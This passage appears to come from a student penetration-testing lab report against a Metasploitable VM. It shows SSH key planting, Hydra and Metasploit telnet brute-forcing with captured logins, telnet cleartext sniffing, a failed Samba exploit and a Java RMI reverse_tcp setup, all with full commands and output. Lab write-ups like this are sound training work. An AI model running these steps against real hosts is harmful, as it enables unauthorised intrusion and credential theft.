-rw-r--r-- 1 kali  kali       0 May  7 2010 .sudo_as_admin_successful
drwxr-xr-x  7 kali  kali      4096 May  4 23:45 vulnerable
root@kali:/tmp/direc_1/msfadmin# cd .ssh
root@kali:/tmp/direc_1/msfadmin/.ssh# ls -al
total 20
drwx----- 2 kali  kali      4096 May 17 2010 .
drwxr-xr-x  7 kali  kali      4096 May  4 06:25 ..
-rw-r--r-- 1 kali  kali      609 May  7 2010 authorized_keys
-rw----- 1 kali  kali     1675 May 17 2010 id_rsa
-rw-r--r-- 1 kali  kali      405 May 17 2010 id_rsa.pub

```

- This .ssh folder contains the public, private and authorized key for the SSH login for the specific user as we see above highlighted.

- Now we create our own ssh key and append that public key into the authorized_keys of target host. For that we use **ssh-keygen** command. Hence, by cat command, we can view the key generated.

```

root@kali:/# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): direc_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in direc_rsa.
Your public key has been saved in direc_rsa.pub.
The key fingerprint is:
SHA256:TIVX/tphesmcRziGdCyFhETNkgGMpZYsOYAO8i1M/c root@kali
The key's randomart image is:
+---[RSA 3072]----+
|o o+..00.B=
|= ...+.0 ...+0.
|00 * . . =
| + + .+ 0 0 0 .
|. .ES 0 . =..
| .. +00.
| . .0..
| 0 ..0
| ..0+.
+---[SHA256]----+
root@kali:/# cat direc_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAQABAAABgQCuokZELkebpVmWPFI1CuPry34qmmI3pU6F+/5I0KPxw3agRRl8fimre7rCi15j3es0EdjdIci9CQuBn3HctbMcmJ48UYbCHeZWcx3VSHD+INbFkvWkkaY4sT
3ek87crOfPbkCVU1PpAMZjoqwGERQIhYQj6MrZ2v/H059w4k5E60)+iRC0163r2W22lZtp2qncPljh2WLM5jha3waeYjStyDvrBIzUbbbs+QgeEGMBlthea1fpkbUqSyPwW5hp5/SMhUeeJwT2FZMhF9+f
yRR1QpvMW0uTX06hBekjbaCx95xybVfxGA/hCWQieL2UPlyPr/NEqYB81th9zhE1LMU3ORQRvN8C2Mhr713Ly7/73vFMRwNIzWWfcsg/lyT0UofDCVLYHWN1jcrZ0BB8/wKGOp+qTDy/qLJ0T07RjnidoHdJg
q53G3LVH2t9Y/q9tV4vTHvcilyu5ApJXIPW0+xEvuXiSpZMv+cGpz87jc6rHOp0b4EyMq3tqv8Hk= root@kali

```

- Go to /.ssh folder and now merge this key into authorized_keys by **echo** command

```

root@kali:/tmp/direc_1/msfadmin/.ssh# echo direc_rsa >> authorized_keys
root@kali:/tmp/direc_1/msfadmin/.ssh# cat authorized_keys
ssh-dss AAAAB3NzaC1kc3MAAACBANwgcBhvxF2YRX0gTizyoZazzHiU5+63hKF0hzJch8dZQpFU5gGKDkZ30rC4jrNqCXNDN50RA4ylcNt078B/I4+5YCZ39faSiXIoLfi8t0WtTtg3lkuv3eSV0zuSGeqZP
HMtep6iizQA5yoClkCjy8swXH+cPBG5uRPiXYL911rAAAAAFQDL+pKrLy6vy9HCywXWZ/jcPpPHEQAAIAgt+cN3fDT1RCYz/VmqfUsqW4jtZ06kvx3L82T2Z1YVeXe7929JWeu9d30B+NeE8EopMiWaTZT0WI
+0kzxSAGyuTskue4nvGCfxnDr58xa1pZcS066R5jCSARMHU6WBWId3MYzsJNZqTN4uoRa4tIFwM8X99K0UUVmLvNbPByEAAAIBNFKRDwM/QnEpRTTsRBh9rALq6eDbLNbu/5gozf4Fv1Dt1Zmp5ZxtXeQtW5
BYyorILRZ5/Y4pChRa01bxTRSJah0RJk5wxAUZ282N07fcJyVlBojMvPlbApIpSiecCuLGX7G04Ie8SFzT+wCketP9Vrw0PvtUZU3DfrVCytg= user@metasploitable
direc_rsa

```

- Finally login using ssh to remote host as login **msfadmin** by the command

Syntax: **ssh -i direc_rsa msfadmin@10.0.50.58**

-i : provides the path where our private key is located

- Hence, we gained access to remote host and executed commands to know the **id** of the host, hostname etc.

```

root@kali:/# ssh -i direc_rsa msfadmin@192.168.56.105
msfadmin@192.168.56.105's password:
Permission denied, please try again.
msfadmin@192.168.56.105's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue May  5 10:59:04 2020 from 192.168.56.101
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin)
Activate Windows

```

SSH password on a remote host

Using hydra, discovering ssh passwords and the user and password files are on desktop location.

```

root@kali:/# hydra -L ~/Desktop/user.txt -P ~/Desktop/pass.txt 192.168.56.105 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-20 14:03:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task
[DATA] attacking ssh://192.168.56.105:22/
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-20 14:03:56
root@kali:/#

```

OUTPUT: By 2 methods we discovered SSH passwords.

6. Telnet - Brute Force

The module present for telnet to break the authentication is,

```
msf5 auxiliary(scanner/ssh/ssh_login) > search telnet_login
Matching Modules
=====
#  Name                                     Disclosure Date  Rank   Check  Description
-  --
0  auxiliary/scanner/telnet/telnet_login    normal          No    Telnet Login Check Scanner
```

Using this module highlighted, we are going to modify the options under this and run the command to brute force the user lists against password list.

Checking for the **auxiliary/scanner/telnet/telnet_login** module, and modifying the configurations under options. The RHOSTS is set to ip **192.168.56.105**, the USER_FILE and PASS_FILE are set to the **user.txt** and **pass.txt** which has names and passwords listed i created. The port name is already shown as **23** for TELNET. Also setting the **BRUTEFORCE_SPEED** to lowest to fasten the attack and **VERBOSE** set to **true**.

To stop after 1 successful login we have set **stop_on_success** to **true**.

The below screenshot shows all options after modified.

```

msf5 auxiliary(scanner/telnet/telnet_login) > set BRUTEFORCE_SPEED 2
BRUTEFORCE_SPEED => 2
msf5 auxiliary(scanner/telnet/telnet_login) > set RHOSTS 192.168.56.105
RHOSTS => 192.168.56.105
msf5 auxiliary(scanner/telnet/telnet_login) > set USER_FILE ~/Desktop/user.txt
USER_FILE => ~/Desktop/user.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set PASS_FILE ~/Desktop/pass.txt
PASS_FILE => ~/Desktop/pass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/telnet/telnet_login) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(scanner/telnet/telnet_login) > show options

Module options (auxiliary/scanner/telnet/telnet_login):

Name          Current Setting   Required  Description
----          -----
BLANK_PASSWORDS  false        no        Try blank passwords for all users
BRUTEFORCE_SPEED  2           yes       How fast to bruteforce, from 0 to 5
DB_ALL_CREDS    false        no        Try each user/password couple stored in the current database
DB_ALL_PASS     false        no        Add all passwords in the current database to the list
DB_ALL_USERS    false        no        Add all users in the current database to the list
PASS_FILE       ~/Desktop/pass.txt  no        File containing passwords, one per line
RHOSTS          192.168.56.105 yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT           23           yes      The target port (TCP)
STOP_ON_SUCCESS true         yes      Stop guessing when a credential works for a host
THREADS         1            yes      The number of concurrent threads (max one per host)
USERPASS_FILE   false        no        File containing users and passwords separated by space, one pair per line
USER_AS_PASS    false        no        Try the username as the password for all users
USER_FILE       ~/Desktop/user.txt  no        File containing usernames, one per line
VERBOSE         true         yes      Whether to print output for all attempts

```

Activate Wi-Fi

After running with modified configurations, the user names are checked individually against every password for successful and failed logins. Thus, **brute force** is performed and we get the below,

```

msf5 auxiliary(scanner/telnet/telnet_login) > run

[!] 192.168.56.105:23 - No active DB -- Credential data will not be saved!
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:123456 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:msfadmin (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:user (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:password (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:qwerty (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:123456789 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:123445 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:1234 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:admin (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:1234567 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:dragon (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:123123 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:baseball (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:abc123 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:football (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:monkey (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:letmein (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:696969 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:shadow (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:master (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:666666 (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: admin:qwerty (Incorrect: )
[-] 192.168.56.105:23 - 192.168.56.105:23 - LOGIN FAILED: msfadmin:123456 (Incorrect: )
[+] 192.168.56.105:23 - 192.168.56.105:23 - Login Successful: msfadmin:msfadmin
[*] 192.168.56.105:23 - Attempting to start session 192.168.56.105:23 with msfadmin:msfadmin
[*] Command shell session 4 opened (192.168.56.101:40485 → 192.168.56.105:23) at 2020-05-17 10:26:31 -0400
[*] 192.168.56.105:23 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```

We get 1st successful login and the execution gets stopped and wont go further. So using **sessions** we can know the active sessions with user id and password and particularly we can login to that successful id and password we got above by **sessions -i Id_no** and here the session id is **3**.

```
msf5 auxiliary(scanner/telnet/telnet_login) > sessions
Active sessions
=====
Id  Name  Type      Information          Connection
--  ---   ----
2   shell  unknown  SSH user:user (192.168.56.105:22)  192.168.56.101:46581 → 192.168.56.105:22 (192.168.56.105)
3   shell  unknown  SSH msfadmin:msfadmin (192.168.56.105:22)  192.168.56.101:40347 → 192.168.56.105:22 (192.168.56.105)
4   shell  TELNET  msfadmin:msfadmin (192.168.56.105:23)  192.168.56.101:40485 → 192.168.56.105:23 (192.168.56.105)

[*] interrupt. use the exit command to quit
msf5 auxiliary(scanner/telnet/telnet_login) > sessions -i 3
[*] Starting interaction with 3 ...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
ls
vulnerable
|
```

Activate Windows
Go to PC settings to activate Windows.

OUTPUT: Through the module, we modified certain configuration settings and set user id and common password files to run a brute force attack on **telnet** module. Hence, got a successful login and executed few shell commands like **Id** which gives root user and **ls** command to list files etc.,

7. Telnet - Clear text capture (captured in Wireshark)

Telnet is one of the earliest remote login protocols on the Internet. It has no security built-in like no encryption or authentication used and no policies are in telnet. They can be used inside local systems but to be avoided for public networks or outside local network environments where the network cannot be fully trusted.

Using **telnet**, i can connect to the server using credentials **username - msfadmin** and **password - msfadmin** which gives me a successful login into a shell console. We use my basic shell commands and execute them for the results needed to be displayed.

Now a network attacker can perform a **man in the middle** attack and can use **wireshark** to capture the data packets sent from user to the server. Thus he may get the **credentials in clear** and also whatever user is executing using shell commands.

The below shows using telnet we connect to server ip 192.168.56.103 and give the credentials to login into that server. Some shell commands are executed like **id**, **ls**, **mkdir**.

The wireshark captured packets are shown with protocol as **telnet**. All the packets are unencrypted.

No.	Time	Source	Destination	Protocol	Length/Info
1	0.000000000	192.168.56.101	192.168.56.105	TCP	74 45900 - 23 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1 TSval=896059139 TSecr=896059139 WS=128
2	0.000975457	192.168.56.105	192.168.56.101	TCP	74 23 - 45900 [SYN, ACK] Seq=0 Ack=1 Win=5792 Len=0 MSS=1460 SACK_PERM=1 TSval=7130808 TSecr=896059140
3	0.001049412	192.168.56.101	192.168.56.105	TCP	66 45900 - 23 [ACK] Seq=1 Ack=1 Win=64256 Len=0 TSval=896059140 TSecr=7130808
4	0.002334877	192.168.56.101	192.168.56.105	TELNET	93 Telnet Data ...
5	0.003036160	192.168.56.105	192.168.56.101	TCP	66 23 - 45900 [ACK] Seq=1 Ack=28 Win=5792 Len=0 TSval=7130808 TSecr=896059141
6	0.007714458	192.168.56.105	192.168.56.101	TELNET	78 Telnet Data ...
7	0.007791296	192.168.56.101	192.168.56.105	TCP	66 45900 - 23 [ACK] Seq=28 Ack=13 Win=64256 Len=0 TSval=896059147 TSecr=7130809
8	0.008512011	192.168.56.105	192.168.56.101	TELNET	105 Telnet Data ...
9	0.008539605	192.168.56.101	192.168.56.105	TCP	66 45900 - 23 [ACK] Seq=28 Ack=52 Win=64256 Len=0 TSval=896059147 TSecr=7130809
10	0.008946224	192.168.56.101	192.168.56.105	TELNET	149 Telnet Data ...
11	0.014777278	192.168.56.105	192.168.56.101	TELNET	69 Telnet Data ...
12	0.014822749	192.168.56.101	192.168.56.105	TCP	66 45900 - 23 [ACK] Seq=111 Ack=55 Win=64256 Len=0 TSval=896059154 TSecr=7130809
13	0.016289878	192.168.56.101	192.168.56.105	TELNET	69 Telnet Data ...
14	0.017065329	192.168.56.105	192.168.56.101	TELNET	69 Telnet Data ...
15	0.017109857	192.168.56.101	192.168.56.105	TCP	66 45900 - 23 [ACK] Seq=114 Ack=58 Win=64256 Len=0 TSval=896059156 TSecr=7130810
16	0.017492022	192.168.56.101	192.168.56.105	TELNET	69 Telnet Data ...
17	0.017928648	192.168.56.105	192.168.56.101	TELNET	686 Telnet Data ...
18	0.017963804	192.168.56.101	192.168.56.105	TCP	66 45900 - 23 [ACK] Seq=117 Ack=678 Win=64128 Len=0 TSval=896059157 TSecr=7130810
19	0.055918320	192.168.56.105	192.168.56.101	TCP	66 23 - 45900 [ACK] Seq=678 Ack=117 Win=5792 Len=0 TSval=7130814 TSecr=896059156
20	2.088135656	192.168.56.101	192.168.56.105	TELNET	67 Telnet Data ...
21	2.088831308	192.168.56.105	192.168.56.101	TCP	66 23 - 45900 [ACK] Seq=678 Ack=118 Win=5792 Len=0 TSval=7131017 TSecr=896061227
22	2.090922895	192.168.56.105	192.168.56.101	TELNET	67 Telnet Data ...
23	2.089946721	192.168.56.101	192.168.56.105	TCP	66 45900 - 23 [ACK] Seq=118 Ack=679 Win=64128 Len=0 TSval=896061228 TSecr=7131017
24	2.328968604	192.168.56.101	192.168.56.105	TELNET	67 Telnet Data ...

Here under the **Protocol** there is telnet that we are using to connect to server. Now i by clicking 1 packet and giving **tcp follow stream**, it gives a result of everything i executed starting from login till end by combining all packets in that stream below,

```

msfadmin@metasploitable:~/vulnerable$ llss
mysql-ssl samba tikiwiki twiki20030201
msfadmin@metasploitable:~/vulnerable$ ccaatt ssaammbbaa
cat: samba: Is a directory
msfadmin@metasploitable:~/vulnerable$ cc.. .mmkkddiirr hheelllloo
msfadmin@metasploitable:~/vulnerable$ llss
hello mysql-ssl samba tikiwiki twiki20030201
msfadmin@metasploitable:~/vulnerable$

```

OUTPUT: Captured **user id** and **password** in **clear text** in wireshark that is highlighted and also some commands executed inside shell giving out results of files listed and creating directories. Even they can be modified.

8. SAMBA - Remote code execution

For **samba**, there are 25 modules shown below. And the chosen module is **auxiliary/linux/samba/is_known_pipename**

Matching Modules						
#	Name	Disclosure Date	Rank	Check	Description	
0	auxiliary/admin/smb/samba_symlink_traversal	2003-04-07	normal	No	Samba Symlink Directory Traversal	
1	auxiliary/dos/samba/lsa_addprivs_heap	2010-06-16	normal	No	Samba lsa_io_privilege_set Heap Overflow	
2	auxiliary/dos/samba/lsa_transnames_heap	2003-04-07	normal	No	Samba lsa_io_trans_names Heap Overflow	
3	auxiliary/dos/samba/read_nttrans_ea_list	2003-04-07	normal	No	Samba read_nttrans_ea_list Integer Overflow	
4	auxiliary/scanner/rsync/modules_list	2003-04-07	normal	No	List Rsync Modules	
5	auxiliary/scanner/smb/smb_uninit_cred	2003-04-07	normal	Yes	Samba _netr_ServerPasswordSet Uninitialized Credential State	
6	exploit/freebsd/samba/trans2open	2003-04-07	great	No	Samba trans2open Overflow (*BSD x86)	
7	exploit/linux/samba/chain_reply	2012-04-10	good	No	Samba chain_reply Memory Corruption (Linux x86)	
8	exploit/linux/samba/is_known_pipename	2017-03-24	excellent	Yes	Samba is_known_pipename() Arbitrary Module Load	
9	exploit/linux/samba/lsa_transnames_heap	2007-05-14	good	Yes	Samba lsa_io_trans_names Heap Overflow	
10	exploit/linux/samba/setinfopolicy_heap	2012-04-10	normal	Yes	Samba SetInformationPolicy AuditEventsInfo Heap Overflow	
11	exploit/linux/samba/trans2open	2003-04-07	great	No	Samba trans2open Overflow (Linux x86)	
12	exploit/multi/samba/nttrans	2003-04-07	average	No	Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow	
13	exploit/multi/samba/usermap_script	2007-05-14	excellent	No	Samba "username map script" Command Execution	
14	exploit/osx/samba/lsa_transnames_heap	2007-05-14	average	No	Samba lsa_io_trans_names Heap Overflow	
15	exploit/osx/samba/trans2open	2003-04-07	great	No	Samba trans2open Overflow (Mac OS X PPC)	
16	exploit/solaris/samba/lsa_transnames_heap	2007-05-14	average	No	Samba lsa_io_trans_names Heap Overflow	
17	exploit/solaris/samba/trans2open	2003-04-07	great	No	Samba trans2open Overflow (Solaris SPARC)	
18	exploit/unix/http/quest_kace_systems_management_rce	2018-05-31	excellent	Yes	Quest KACE Systems Management Command Injection	
19	exploit/unix/misc/distcc_exec	2002-02-01	excellent	Yes	DistCC Daemon Command Execution	
20	exploit/unix/webapp/citrix_access_gateway_exec	2010-12-21	excellent	Yes	Citrix Access Gateway Command Execution	
21	exploit/windows/fileformat/ms14_060_sandworm	2014-10-14	excellent	No	MS14-060 Microsoft Windows OLE Package Manager Code Execution	
22	exploit/windows/http/samarber6_search_results	2003-06-21	normal	Yes	Sambar 6 Search Results Buffer Overflow	
23	exploit/windows/license/caliclcnt_getconfig	2005-03-02	average	No	Computer Associates License Client GETCONFIG Overflow	
24	exploit/windows/smb/group_policy_startup	2015-01-26	manual	No	Group Policy Script Execution From Shared Resource	
25	post/linux/gather/enum_configs		normal	No	Linux Gather Configurations	

Under the **show options**, set the RHOSTS to server ip and port is already set to **445**. The below shows modified options

```

Module options (exploit/linux/samba/is_known_pipename):
Name      Current Setting  Required  Description
----      -----          -----      -----
RHOSTS    192.168.56.105  yes        The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT     445             yes        The SMB service port (TCP)
SMB_FOLDER          no        The directory to use within the writeable SMB share
SMB_SHARE_NAME       no        The name of the SMB share containing a writeable directory

Payload options (cmd/unix/interact):
Name      Current Setting  Required  Description
----      -----          -----      -----


Exploit target:
Id  Name
--  --
0   Automatic (Interact)

```

Now, give run command

```

msf5 exploit(linux/samba/is_known_pipename) > run

[*] 192.168.56.105:445 - Using location '\\192.168.56.105\tmp\ for the path
[*] 192.168.56.105:445 - Retrieving the remote path of the share 'tmp'
[*] 192.168.56.105:445 - Share 'tmp' has server-side path '/tmp'
[*] 192.168.56.105:445 - Uploaded payload to '\\192.168.56.105\tmp\ZfWUBkyj.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/ZfWUBkyj.so using \\PIPE\\tmp/ZfWUBkyj.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/ZfWUBkyj.so using /tmp/ZfWUBkyj.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to '\\192.168.56.105\tmp\maNwugqG.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/maNwugqG.so using \\PIPE\\tmp/maNwugqG.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/maNwugqG.so using /tmp/maNwugqG.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to '\\192.168.56.105\tmp\lSNGifSn.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/lSNGifSn.so using \\PIPE\\tmp/lSNGifSn.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/lSNGifSn.so using /tmp/lSNGifSn.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to '\\192.168.56.105\tmp\SimYEpVz.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/SimYEpVz.so using \\PIPE\\tmp/SimYEpVz.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/SimYEpVz.so using /tmp/SimYEpVz.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to '\\192.168.56.105\tmp\WgvDMdtD.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/WgvDMdtD.so using \\PIPE\\tmp/WgvDMdtD.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/WgvDMdtD.so using /tmp/WgvDMdtD.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to '\\192.168.56.105\tmp\vYuSckor.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/vYuSckor.so using \\PIPE\\tmp/vYuSckor.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/vYuSckor.so using /tmp/vYuSckor.so ...
[-] 192.168.56.105:445 -> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to '\\192.168.56.105\tmp\enLOLOMJ.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/enLOLOMJ.so using \\PIPE\\tmp/enLOLOMJ.so ...

```

```

[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/SNJZMHGF.so using \\PIPE\\tmp/SNJZMHGF.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/SNJZMHGF.so using /tmp/SNJZMHGF.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to \\192.168.56.105\temp\xqWzIHR.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/qXqWzIHR.so using \\PIPE\\tmp/qXqWzIHR.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/qXqWzIHR.so using /tmp/qXqWzIHR.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to \\192.168.56.105\temp\codcBEnI.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/codcBEnI.so using \\PIPE\\tmp/codcBEnI.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/codcBEnI.so using /tmp/codcBEnI.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to \\192.168.56.105\temp\CzFVxaz0.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/CzFVxaz0.so using \\PIPE\\tmp/CzFVxaz0.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/CzFVxaz0.so using /tmp/CzFVxaz0.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to \\192.168.56.105\temp\nhQVFmxv.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/nhQVFmxv.so using \\PIPE\\tmp/nhQVFmxv.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/nhQVFmxv.so using /tmp/nhQVFmxv.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to \\192.168.56.105\temp\EjzFwVzJ.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/EjzFwVzJ.so using \\PIPE\\tmp/EjzFwVzJ.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/EjzFwVzJ.so using /tmp/EjzFwVzJ.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Uploaded payload to \\192.168.56.105\temp\GqFCoYjY.so
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/GqFCoYjY.so using \\PIPE\\tmp/GqFCoYjY.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.56.105:445 - Loading the payload from server-side path /tmp/GqFCoYjY.so using /tmp/GqFCoYjY.so ...
[-] 192.168.56.105:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.

```

Module was configured and run, exploit was completed but no session was opened.

Even after setting the payload, it didnt run.

9. JAVARMI - Remote code execution

For java_rmi service, i use the module **exploit/multi/misc/java_rmi_server** as shown below,

```

msf5 auxiliary(scanner/misc/java_rmi_server) > search java_rmi
Matching Modules
=====
#  Name
-  -----
0  auxiliary/gather/java_rmi_registry
1  auxiliary/scanner/misc/java_rmi_server
2  exploit/multi/browser/java_rmi_connection_impl
3  exploit/multi/misc/java_rmi_server

      Disclosure Date  Rank    Check  Description
-----  -----  -----
0  normal      2011-10-15  normal  No     Java RMI Registry Interfaces Enumeration
1  normal      2010-03-31  excellent  No     Java RMI Server Insecure Endpoint Code Execution Scanner
2  excellent   2010-03-31  excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
3  excellent   2011-10-15  excellent  No     Java RMI Server Insecure Default Configuration Java Code Execution

```

After changing few options like setting RHOSTS to server ip **192.168.56.105**, port is already set to **1099** for java_rmi and VERBOSE to **true** the below screenshot is taken,

```

msf5 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):
Name      Current Setting  Required  Description
----      -----          -----      -----
HTTPDELAY    10            yes        Time that the HTTP Server will wait for the payload request
RHOSTS      192.168.56.105  yes        The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT       1099           yes        The target port (TCP)
SRVHOST     0.0.0.0        yes        The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT     8080           yes        The local port to listen on.
SSL         false          no         Negotiate SSL for incoming connections
SSLCert      no            no         Path to a custom SSL certificate (default is randomly generated)
URIPATH     no            no         The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      -----          -----      -----
LHOST      192.168.56.101  yes        The listen address (an interface may be specified)
LPORT      4444           yes        The listen port

Exploit target:

Id  Name
--  --
0   Generic (Java Payload)

```

